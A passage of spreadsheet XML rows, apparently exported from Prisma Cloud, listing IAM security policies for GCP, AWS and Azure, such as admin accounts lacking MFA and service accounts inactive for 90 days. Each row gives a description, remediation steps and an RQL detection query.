 3. Navigate to the IAM service
 4. Find the binding between the user  and the "Editor" role
 5. Remove the binding
 6. Create a new binding with a least privileged predefined or custom role, if necessary.</t>
        </is>
      </c>
      <c r="Y3052" t="inlineStr"/>
      <c r="Z3052" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' and source.cloud.resource.type = 'user' and grantedby.cloud.policy.name = 'Editor' and grantedby.level.type = 'GCP Organization'</t>
        </is>
      </c>
      <c r="AA3052" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB3052" t="inlineStr">
        <is>
          <t>2024-09-19 15:48:11</t>
        </is>
      </c>
      <c r="AC3052" t="inlineStr"/>
      <c r="AD3052" t="b">
        <v>0</v>
      </c>
      <c r="AE3052" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3052" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG305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2" t="inlineStr">
        <is>
          <t>610231a5-8904-4901-8abb-b51c84bc1963</t>
        </is>
      </c>
      <c r="AI3052" t="inlineStr">
        <is>
          <t>ed8823bb-d18b-4ad1-beb7-2aa082ad6d92</t>
        </is>
      </c>
      <c r="AJ3052" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3052" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3053">
      <c r="A3053" t="inlineStr"/>
      <c r="B3053" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3053" s="2" t="inlineStr"/>
      <c r="D3053" t="inlineStr"/>
      <c r="E3053" t="inlineStr"/>
      <c r="F3053" t="inlineStr"/>
      <c r="G3053" t="b">
        <v>0</v>
      </c>
      <c r="H30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53" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3053" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3053" t="inlineStr">
        <is>
          <t>test</t>
        </is>
      </c>
      <c r="L3053" t="inlineStr"/>
      <c r="M3053" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3053" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3053" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3053" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3053" t="inlineStr"/>
      <c r="R3053" t="inlineStr"/>
      <c r="S3053" t="inlineStr"/>
      <c r="T3053" t="b">
        <v>0</v>
      </c>
      <c r="U3053" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3053" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3053" t="inlineStr">
        <is>
          <t>test</t>
        </is>
      </c>
      <c r="X3053" t="inlineStr">
        <is>
          <t>1) Identify the resource associated with the alert.
2) Determine the IAM role assigned to the resource.
3) Access the IAM configuration, either through infrastructure as code (IaC) or an appropriate management interface.
4) Review the permissions associated with the identified role to locate any risky actions highlighted by the alert.
5) Adjust the policy by removing or restricting the identified risky permissions, ensuring adherence to security standards.
6) Implement and verify the changes to confirm the updated permissions are correctly applied.</t>
        </is>
      </c>
      <c r="Y3053" t="inlineStr"/>
      <c r="Z3053" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.type = 'GCP' AND grantedby.cloud.policy.type = 'GCP Predefined Role' AND grantedby.cloud.policy.name = 'Project IAM Admin'</t>
        </is>
      </c>
      <c r="AA3053" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB3053" t="inlineStr">
        <is>
          <t>2024-11-12 18:56:19</t>
        </is>
      </c>
      <c r="AC3053" t="inlineStr"/>
      <c r="AD3053" t="b">
        <v>0</v>
      </c>
      <c r="AE3053" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3053" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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53" t="inlineStr">
        <is>
          <t>3eae2ec9-d3d3-4936-853d-0dd1bfd667dd</t>
        </is>
      </c>
      <c r="AI3053" t="inlineStr">
        <is>
          <t>50f32130-a3ca-4007-b9fd-469359c66622</t>
        </is>
      </c>
      <c r="AJ3053" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3053" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3054">
      <c r="A3054" t="inlineStr"/>
      <c r="B3054" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3054" s="2" t="inlineStr"/>
      <c r="D3054" t="n">
        <v>0</v>
      </c>
      <c r="E3054" t="n">
        <v>12</v>
      </c>
      <c r="F3054" t="n">
        <v>46</v>
      </c>
      <c r="G3054" t="b">
        <v>1</v>
      </c>
      <c r="H305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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3054" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3054" t="inlineStr">
        <is>
          <t>User account with high privileges and MFA disabled</t>
        </is>
      </c>
      <c r="L3054" t="inlineStr">
        <is>
          <t>MFA</t>
        </is>
      </c>
      <c r="M3054" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3054" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3054" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3054" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3054" t="inlineStr"/>
      <c r="R3054" t="inlineStr"/>
      <c r="S3054" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3054" t="b">
        <v>1</v>
      </c>
      <c r="U3054" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3054" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3054" t="inlineStr">
        <is>
          <t>Identifies user accounts with administrative permissions for which Multi-Factor Authentication (MFA) is not enabled. \nSensitive accounts such as those with administrative permissions are considered high value to attackers and tend to be targeted. \nAs such, these accounts, when not safeguarded by an additional authentication factor, have a higher chance of successful compromise, which would result in the adversary gaining administrative permissions within your ogranization.</t>
        </is>
      </c>
      <c r="X3054" t="inlineStr">
        <is>
          <t>How to investigate?
1. Sign in to the Cloud Console
2. Browse to the IAM service and search for the affected user
3. Examine the user's permissions as well as their role within your organization and determine whether the principle of least privilege is followed
For remediation, use the following remediation steps:
If deemed unnecessary, remove permissions to minimize the user's access. Additionally, enforce MFA on the user. Upon their next login, the user will be prompted to enroll, activating their MFA method</t>
        </is>
      </c>
      <c r="Y305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cli commands'</t>
        </is>
      </c>
      <c r="Z3054" t="inlineStr">
        <is>
          <t>config from iam where action.access.isAdministrative = true AND source.cloud.resource.type = 'user' AND source.mfaenabled = False</t>
        </is>
      </c>
      <c r="AA3054" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3054" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3054" t="inlineStr"/>
      <c r="AD3054" t="b">
        <v>1</v>
      </c>
      <c r="AE3054" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3054" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG305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4" t="inlineStr">
        <is>
          <t>004db026-84f7-448b-9e29-539bcfaaa479</t>
        </is>
      </c>
      <c r="AI3054" t="inlineStr">
        <is>
          <t>004db026-84f7-448b-9e29-539bcfaaa479</t>
        </is>
      </c>
      <c r="AJ3054" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3054" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3055">
      <c r="A3055" t="inlineStr"/>
      <c r="B3055" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3055" s="2" t="inlineStr"/>
      <c r="D3055" t="inlineStr"/>
      <c r="E3055" t="inlineStr"/>
      <c r="F3055" t="inlineStr"/>
      <c r="G3055" t="b">
        <v>1</v>
      </c>
      <c r="H305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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3055" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3055" t="inlineStr">
        <is>
          <t>Cloud Service account with Metadata Read Permissions is inactive for 90 days</t>
        </is>
      </c>
      <c r="L3055" t="inlineStr">
        <is>
          <t>UNUSED_PRIVILEGES</t>
        </is>
      </c>
      <c r="M3055" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3055" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3055" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3055" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3055" t="inlineStr"/>
      <c r="R3055" t="inlineStr"/>
      <c r="S3055" t="inlineStr"/>
      <c r="T3055" t="b">
        <v>1</v>
      </c>
      <c r="U3055" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3055" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3055" t="inlineStr">
        <is>
          <t>Identifies cloud service accounts in Azure, AWS and GCP that have not been used in the last 90 days and hold Metadata Read permissions.</t>
        </is>
      </c>
      <c r="X3055"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the service account, use the following remediation steps:
Log in to your Cloud instance, and navigate to the affected service account. If the service account is deemed to be necessary, edit the entity's permissions following the principle of least privilege and based on the information collected. If the service account is not required, remove it</t>
        </is>
      </c>
      <c r="Y305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055" t="inlineStr">
        <is>
          <t>config from iam where grantedby.cloud.entity.type IN ( 'role', 'serviceaccount', 'service principal', 'user assigned', 'system assigned' ) AND grantedby.cloud.entity.lastlogin.days &gt; 90 AND action.access.level = 'Metadata Read'</t>
        </is>
      </c>
      <c r="AA3055" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3055" t="inlineStr">
        <is>
          <t>2024-09-02 05:55:14</t>
        </is>
      </c>
      <c r="AC3055" t="inlineStr"/>
      <c r="AD3055" t="b">
        <v>1</v>
      </c>
      <c r="AE3055" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3055" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG305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5" t="inlineStr">
        <is>
          <t>7ee0b6bd-6848-413e-b944-b6a4936261cb</t>
        </is>
      </c>
      <c r="AI3055" t="inlineStr">
        <is>
          <t>7ee0b6bd-6848-413e-b944-b6a4936261cb</t>
        </is>
      </c>
      <c r="AJ3055" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3055" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3056">
      <c r="A3056" t="inlineStr"/>
      <c r="B3056" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3056" s="2" t="inlineStr"/>
      <c r="D3056" t="inlineStr"/>
      <c r="E3056" t="inlineStr"/>
      <c r="F3056" t="inlineStr"/>
      <c r="G3056" t="b">
        <v>1</v>
      </c>
      <c r="H305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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3056" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3056" t="inlineStr">
        <is>
          <t>Cloud Service account with Data Write Permissions is inactive for 90 days</t>
        </is>
      </c>
      <c r="L3056" t="inlineStr">
        <is>
          <t>UNUSED_PRIVILEGES</t>
        </is>
      </c>
      <c r="M3056" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3056" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3056" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3056" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3056" t="inlineStr"/>
      <c r="R3056" t="inlineStr"/>
      <c r="S3056" t="inlineStr"/>
      <c r="T3056" t="b">
        <v>1</v>
      </c>
      <c r="U3056" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3056" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3056" t="inlineStr">
        <is>
          <t>Identifies cloud service accounts in Azure, AWS and GCP that have not been used in the last 90 days and hold Data Write permissions.</t>
        </is>
      </c>
      <c r="X3056"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the service account, use the following remediation steps:
Log in to your Cloud instance, and navigate to the affected service account. If the service account is deemed to be necessary, edit the entity's permissions following the principle of least privilege and based on the information collected. If the service account is not required, remove it</t>
        </is>
      </c>
      <c r="Y305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056" t="inlineStr">
        <is>
          <t>config from iam where grantedby.cloud.entity.type IN ( 'role', 'serviceaccount', 'service principal', 'user assigned', 'system assigned' ) AND grantedby.cloud.entity.lastlogin.days &gt; 90 AND action.access.level = 'Data Write'</t>
        </is>
      </c>
      <c r="AA3056" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3056" t="inlineStr">
        <is>
          <t>2024-09-02 05:55:14</t>
        </is>
      </c>
      <c r="AC3056" t="inlineStr"/>
      <c r="AD3056" t="b">
        <v>1</v>
      </c>
      <c r="AE3056" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3056" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG305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6" t="inlineStr">
        <is>
          <t>e404789a-72f3-4f7f-a3ce-9c427ca13cc2</t>
        </is>
      </c>
      <c r="AI3056" t="inlineStr">
        <is>
          <t>e404789a-72f3-4f7f-a3ce-9c427ca13cc2</t>
        </is>
      </c>
      <c r="AJ3056" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3056" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3057">
      <c r="A3057" t="inlineStr"/>
      <c r="B3057" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3057" s="2" t="inlineStr"/>
      <c r="D3057" t="n">
        <v>0</v>
      </c>
      <c r="E3057" t="n">
        <v>220</v>
      </c>
      <c r="F3057" t="n">
        <v>0</v>
      </c>
      <c r="G3057" t="b">
        <v>1</v>
      </c>
      <c r="H30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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3057" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3057" t="inlineStr">
        <is>
          <t>Cloud Service account with Data Read Permissions is inactive for 90 days</t>
        </is>
      </c>
      <c r="L3057" t="inlineStr">
        <is>
          <t>UNUSED_PRIVILEGES</t>
        </is>
      </c>
      <c r="M3057" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3057" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3057" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3057" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3057" t="inlineStr"/>
      <c r="R3057" t="inlineStr"/>
      <c r="S3057" t="inlineStr"/>
      <c r="T3057" t="b">
        <v>1</v>
      </c>
      <c r="U3057" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3057" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3057" t="inlineStr">
        <is>
          <t>Identifies cloud service accounts in Azure, AWS and GCP that have not been used in the last 90 days and hold Data Read permissions.</t>
        </is>
      </c>
      <c r="X3057"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the service account, use the following remediation steps:
Log in to your Cloud instance, and navigate to the affected service account. If the service account is deemed to be necessary, edit the entity's permissions following the principle of least privilege and based on the information collected. If the service account is not required, remove it</t>
        </is>
      </c>
      <c r="Y305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057" t="inlineStr">
        <is>
          <t>config from iam where grantedby.cloud.entity.type IN ( 'role', 'serviceaccount', 'service principal', 'user assigned', 'system assigned' ) AND grantedby.cloud.entity.lastlogin.days &gt; 90 AND action.access.level = 'Data Read'</t>
        </is>
      </c>
      <c r="AA3057" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3057" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3057" t="inlineStr"/>
      <c r="AD3057" t="b">
        <v>1</v>
      </c>
      <c r="AE3057" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3057" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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7" t="inlineStr">
        <is>
          <t>596e2894-7bbc-4eb0-8385-b6f746891ed8</t>
        </is>
      </c>
      <c r="AI3057" t="inlineStr">
        <is>
          <t>596e2894-7bbc-4eb0-8385-b6f746891ed8</t>
        </is>
      </c>
      <c r="AJ3057" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3057" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3058">
      <c r="A3058" t="inlineStr"/>
      <c r="B3058" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3058" s="2" t="inlineStr"/>
      <c r="D3058" t="n">
        <v>0</v>
      </c>
      <c r="E3058" t="n">
        <v>26</v>
      </c>
      <c r="F3058" t="n">
        <v>0</v>
      </c>
      <c r="G3058" t="b">
        <v>1</v>
      </c>
      <c r="H30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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3058" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3058" t="inlineStr">
        <is>
          <t>Cloud Service account with high privileges is inactive for 90 days and is assigned to a resource</t>
        </is>
      </c>
      <c r="L3058" t="inlineStr">
        <is>
          <t>UNUSED_PRIVILEGES</t>
        </is>
      </c>
      <c r="M3058" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3058" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3058" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3058" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3058" t="inlineStr"/>
      <c r="R3058" t="inlineStr"/>
      <c r="S3058" t="inlineStr"/>
      <c r="T3058" t="b">
        <v>1</v>
      </c>
      <c r="U3058" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3058" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3058" t="inlineStr">
        <is>
          <t>Identifies cloud service accounts in Azure, AWS and GCP which have administrative permissions that have not been used in the last 90 days and are attached to a resource. \nAs opposed to user accounts, service accounts are predictable. Therefore, if a service account has administrative permissions which it has not used in the past 90 days, we can confidently say the resource it is attached to does not require them, and remove the permissions, decreasing the blast radius in case of a compromise of the service account.</t>
        </is>
      </c>
      <c r="X3058"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determining which permissions are unnecessary and can be removed based on their last usage, in order to remove them, use the following remediation steps:
Log in to your Cloud instance, and navigate to the affected service account, edit the entity's permissions following the principle of least privilege and based on the information collected. If the service account is used by other resources, consider creating a new one with the minimal permissions required by the resource in question</t>
        </is>
      </c>
      <c r="Y305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cli commands'</t>
        </is>
      </c>
      <c r="Z3058" t="inlineStr">
        <is>
          <t>config from iam where grantedby.cloud.entity.type IN ( 'role', 'serviceaccount', 'service principal', 'user assigned', 'system assigned' ) AND action.access.isAdministrative = true AND grantedby.cloud.entity.lastlogin.days &gt; 90 AND source.cloud.resource.type in ( 'instance', 'function', 'oidc-provider', 'environment', 'task-definition', 'WebIdentity', 'virtualMachines', 'sites', 'App Registration', 'service', 'workflows', 'virtualMachineScaleSets/virtualMachines', 'instances', 'applications', 'services', 'functions', 'serviceAccounts')</t>
        </is>
      </c>
      <c r="AA3058" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3058" t="inlineStr">
        <is>
          <t>2024-08-19 06:03:39</t>
        </is>
      </c>
      <c r="AC3058" t="inlineStr"/>
      <c r="AD3058" t="b">
        <v>1</v>
      </c>
      <c r="AE3058" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3058" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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8" t="inlineStr">
        <is>
          <t>fe6f85ec-d339-416f-857a-370108c7f37c</t>
        </is>
      </c>
      <c r="AI3058" t="inlineStr">
        <is>
          <t>fe6f85ec-d339-416f-857a-370108c7f37c</t>
        </is>
      </c>
      <c r="AJ3058" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3058" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3059">
      <c r="A3059" t="inlineStr"/>
      <c r="B3059" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3059" s="2" t="inlineStr"/>
      <c r="D3059" t="n">
        <v>0</v>
      </c>
      <c r="E3059" t="n">
        <v>393</v>
      </c>
      <c r="F3059" t="n">
        <v>0</v>
      </c>
      <c r="G3059" t="b">
        <v>1</v>
      </c>
      <c r="H305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59" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3059" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3059" t="inlineStr">
        <is>
          <t>Cloud Service account with Metadata Write Permissions is inactive for 90 days</t>
        </is>
      </c>
      <c r="L3059" t="inlineStr">
        <is>
          <t>UNUSED_PRIVILEGES</t>
        </is>
      </c>
      <c r="M3059" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3059" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3059" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3059" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3059" t="inlineStr"/>
      <c r="R3059" t="inlineStr"/>
      <c r="S3059" t="inlineStr"/>
      <c r="T3059" t="b">
        <v>1</v>
      </c>
      <c r="U3059" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3059" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3059" t="inlineStr">
        <is>
          <t>Identifies cloud service accounts in Azure, AWS and GCP that have not been used in the last 90 days and hold Metadata Write permissions.</t>
        </is>
      </c>
      <c r="X3059"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the service account, use the following remediation steps:
Log in to your Cloud instance, and navigate to the affected service account. If the service account is deemed to be necessary, edit the entity's permissions following the principle of least privilege and based on the information collected. If the service account is not required, remove it</t>
        </is>
      </c>
      <c r="Y305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059" t="inlineStr">
        <is>
          <t>config from iam where grantedby.cloud.entity.type IN ( 'role', 'serviceaccount', 'service principal', 'user assigned', 'system assigned' ) AND grantedby.cloud.entity.lastlogin.days &gt; 90 AND action.access.level = 'Metadata Write'</t>
        </is>
      </c>
      <c r="AA3059" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3059" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3059" t="inlineStr"/>
      <c r="AD3059" t="b">
        <v>1</v>
      </c>
      <c r="AE3059" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3059" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG305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59" t="inlineStr">
        <is>
          <t>a5b92b3b-ca56-4e1c-8fd1-ff9c3dc9449f</t>
        </is>
      </c>
      <c r="AI3059" t="inlineStr">
        <is>
          <t>a5b92b3b-ca56-4e1c-8fd1-ff9c3dc9449f</t>
        </is>
      </c>
      <c r="AJ3059" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3059" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3060">
      <c r="A3060" t="inlineStr"/>
      <c r="B3060" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3060" s="2" t="inlineStr"/>
      <c r="D3060" t="n">
        <v>0</v>
      </c>
      <c r="E3060" t="n">
        <v>398</v>
      </c>
      <c r="F3060" t="n">
        <v>0</v>
      </c>
      <c r="G3060" t="b">
        <v>1</v>
      </c>
      <c r="H30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60" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3060" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3060" t="inlineStr">
        <is>
          <t>Cloud Service account is inactive for 90 days</t>
        </is>
      </c>
      <c r="L3060" t="inlineStr">
        <is>
          <t>UNUSED_PRIVILEGES</t>
        </is>
      </c>
      <c r="M3060" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3060" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3060" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3060" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3060" t="inlineStr"/>
      <c r="R3060" t="inlineStr"/>
      <c r="S3060" t="inlineStr"/>
      <c r="T3060" t="b">
        <v>1</v>
      </c>
      <c r="U3060" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3060" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3060" t="inlineStr">
        <is>
          <t>Identifies cloud service accounts in Azure, AWS and GCP that have not been used in the last 90 days.</t>
        </is>
      </c>
      <c r="X3060" t="inlineStr">
        <is>
          <t>How to investigate?
1. In the Prisma Cloud Console, under the "Alerts" tab, select "Asset Name" and take note of the "Name" and "Asset Type", then exit the tab. Select the "Alert ID", then "Investigate"
2. In the results, you will see the resource, the service account attached to it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the service account, use the following remediation steps:
Log in to your Cloud instance, and navigate to the affected service account. If the service account is deemed to be necessary, edit the entity's permissions following the principle of least privilege and based on the information collected. If the service account is not required, remove it</t>
        </is>
      </c>
      <c r="Y306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060" t="inlineStr">
        <is>
          <t>config from iam where grantedby.cloud.entity.type IN ( 'role', 'serviceaccount', 'service principal', 'user assigned', 'system assigned' ) AND grantedby.cloud.entity.lastlogin.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3060" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3060" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3060" t="inlineStr"/>
      <c r="AD3060" t="b">
        <v>1</v>
      </c>
      <c r="AE3060" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3060" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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60" t="inlineStr">
        <is>
          <t>ed28926c-62a3-4586-af70-d965906922b1</t>
        </is>
      </c>
      <c r="AI3060" t="inlineStr">
        <is>
          <t>ed28926c-62a3-4586-af70-d965906922b1</t>
        </is>
      </c>
      <c r="AJ3060" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3060" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3061">
      <c r="A3061" t="inlineStr"/>
      <c r="B3061" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3061" s="2" t="inlineStr"/>
      <c r="D3061" t="n">
        <v>0</v>
      </c>
      <c r="E3061" t="n">
        <v>133</v>
      </c>
      <c r="F3061" t="n">
        <v>0</v>
      </c>
      <c r="G3061" t="b">
        <v>1</v>
      </c>
      <c r="H30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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3061" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3061" t="inlineStr">
        <is>
          <t>User account with excessive admin privileges</t>
        </is>
      </c>
      <c r="L3061" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3061" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3061" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3061" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3061" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3061" t="inlineStr"/>
      <c r="R3061" t="inlineStr"/>
      <c r="S3061" t="inlineStr"/>
      <c r="T3061" t="b">
        <v>1</v>
      </c>
      <c r="U3061" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3061" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3061" t="inlineStr">
        <is>
